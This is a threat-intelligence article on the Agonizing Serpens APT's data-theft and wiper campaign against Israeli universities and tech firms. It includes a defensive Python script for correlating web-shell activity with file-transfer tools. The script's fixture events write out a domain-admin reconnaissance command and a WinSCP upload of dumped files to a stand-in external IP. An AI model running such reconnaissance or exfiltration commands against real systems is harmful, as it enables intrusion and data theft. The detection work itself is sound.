Iranian APT Group Agonizing Serpens Launches Destructive Cyber Attacks on Israeli Higher Education and Tech Sectors
In a series of destructive cyber attacks that began in January 2023 and continued until October, the Israeli higher education and technology sectors were targeted by an Iranian Advanced Persistent Threat (APT) group tracked as Agonizing Serpens. The campaign deployed previously undocumented wiper malware to destroy data on the compromised systems after it had been stolen.
Attribution to Agonizing Serpens APT Group
Agonizing Serpens is also tracked under the aliases Agrius, BlackShadow, and Pink Sandstorm (previously Americium). According to Palo Alto Networks Unit 42, which analyzed the attacks, the intrusions were characterized by attempts to steal sensitive data, such as personally identifiable information (PII) and intellectual property, before the destructive stage.
Overview of Attack Methodology
After stealing the targeted information, the attackers deployed wipers to destroy evidence and render the infected endpoints inoperable. Three wipers were observed: MultiLayer, PartialWasher, and BFG Agonizer. Data collection relied on a separate custom tool, Sqlextractor, built to pull information from database servers; it is a collection tool, not a wiper.
Agonizing Serpens APT Group's History
Agonizing Serpens has been active since at least December 2020 and has previously been linked to wiper attacks against Israeli entities. A May 2023 report from a cybersecurity research firm detailed the group's use of a ransomware strain known as Moneybird in attacks targeting the country.
Detailed Attack Phases
The latest series of attacks unfolded in several phases. Initial access came from compromising vulnerable internet-facing web servers. The attackers then deployed web shells, performed reconnaissance of the victim network, and stole the credentials of users with administrative privileges.
Lateral movement was followed by data exfiltration using a mix of public and custom tools, including Sqlextractor, WinSCP, and PuTTY. The final step in the chain was delivery of the wipers MultiLayer, PartialWasher, and BFG Agonizer.
WinSCP is a popular open-source SFTP and FTP client for secure file transfer between local and remote systems, used primarily in Windows environments.
PuTTY is a free and widely used terminal emulator and SSH client for remotely accessing and managing network devices and servers, mainly on Windows platforms. Both are legitimate administration tools that are often already present or permitted in enterprise environments, which is why their use is hard to flag on its own; the signal lies in context, such as a file-transfer client running on a web or database server, being launched from a web server worker process, or connecting to an external host.
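The attack chain described above (web shell on an internet-facing server, then file-transfer tools for exfiltration) can be hunted for in endpoint process-creation telemetry by correlating the two stages on the same host. The following script is an added example written for this page, not code or detection logic from Unit 42 or from the campaign's tooling. The event records, hostnames, process names and the 203.0.113.10 address are constructed for illustration; the lists of web server worker processes and transfer tools are assumptions a defender would tune to their own environment.

```python
"""Correlate web-shell-style shell spawns with file-transfer tool execution.

Constructed example: the events below are made up for illustration and are not
taken from the Unit 42 report or from any real incident.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed web server worker processes; a shell spawned by one of these is a
# classic web shell indicator (tune to the servers actually in the estate).
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat9.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Legitimate admin tools used for exfiltration in this campaign; on their own
# they are weak evidence, so they only raise severity when context supports it.
TRANSFER_TOOLS = {"winscp.exe", "putty.exe", "pscp.exe", "plink.exe", "psftp.exe"}

# Constructed, simplified Sysmon Event ID 1 style records.
EVENTS = [
    {"ts": "2023-03-01T10:00:05", "host": "WEB01", "parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c "whoami & net group \\"domain admins\\" /domain"'},
    {"ts": "2023-03-01T10:02:10", "host": "WEB01", "parent": "cmd.exe", "image": "winscp.exe",
     "cmdline": 'winscp.exe /command "open sftp://svc@203.0.113.10" "put C:\\dump\\*"'},
    {"ts": "2023-03-01T09:30:00", "host": "ADMIN-PC", "parent": "explorer.exe", "image": "putty.exe",
     "cmdline": "putty.exe -ssh bastion.corp.example"},
    {"ts": "2023-03-01T11:00:00", "host": "WEB02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]


def parse_ts(value):
    return datetime.fromisoformat(value)


def webshell_events(events):
    """Shell processes whose parent is a web server worker."""
    return [e for e in events
            if e["parent"].lower() in WEB_WORKERS and e["image"].lower() in SHELLS]


def transfer_tool_events(events):
    """Any execution of the file-transfer / SSH tools seen in the campaign."""
    return [e for e in events if e["image"].lower() in TRANSFER_TOOLS]


def correlate(events, window=timedelta(hours=1)):
    """Return per-host findings keyed by hostname.

    severity 'high'  : web-shell spawn followed within `window` by a transfer tool
    severity 'medium': web-shell spawn alone
    severity 'low'   : transfer tool alone (frequently benign admin use)
    Hosts with neither indicator are omitted.
    """
    shells, tools = defaultdict(list), defaultdict(list)
    for e in webshell_events(events):
        shells[e["host"]].append(e)
    for e in transfer_tool_events(events):
        tools[e["host"]].append(e)

    findings = {}
    for host in set(shells) | set(tools):
        severity = "medium" if shells[host] else "low"
        for s in shells[host]:
            for t in tools[host]:
                delta = parse_ts(t["ts"]) - parse_ts(s["ts"])
                if timedelta(0) <= delta <= window:
                    severity = "high"  # exfil tooling shortly after the web shell
        findings[host] = {"severity": severity, "events": shells[host] + tools[host]}
    return findings


if __name__ == "__main__":
    for host, finding in sorted(correlate(EVENTS).items()):
        print(f"{host}: {finding['severity']}")
        for e in finding["events"]:
            print(f"  {e['ts']} {e['parent']} -> {e['image']}")
```

Against the constructed events, WEB01 scores high because cmd.exe was spawned by w3wp.exe and WinSCP ran two minutes later on the same host; ADMIN-PC scores low because PuTTY launched from an interactive session on a workstation is ordinary administration; WEB02 is not reported. The ordering of the two stages matters: the code only escalates when the transfer tool runs after the shell spawn, which avoids treating routine earlier administration as part of the chain.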
Ongoing Evolution of Agonizing Serpens
Agonizing Serpens continues to refine its capabilities. To bypass Endpoint Detection and Response (EDR) and other security controls, the group regularly rotates between known proof-of-concept (PoC) and pentesting tools and develops custom tooling of its own. For defenders, this means signatures for any single tool age quickly; detections that key on behavior, such as shells spawned by web server processes or file-transfer clients running on servers, hold up better than hashes or tool names.
Endpoint Detection and Response (EDR) is a cybersecurity technology that monitors and responds to security threats at the individual device level, providing real-time visibility, threat detection, and remediation on endpoints, such as computers and mobile devices.
Conclusion
The Agonizing Serpens APT group's attacks on the Israeli higher education and technology sectors, combined with its evolving tactics and custom tooling, underline the need for hardening of internet-facing web servers, monitoring for web shell activity and credential theft, and threat intelligence that tracks the group's changing toolset. Continued work to attribute and counter these intrusions remains essential for organizations responsible for critical infrastructure and sensitive data.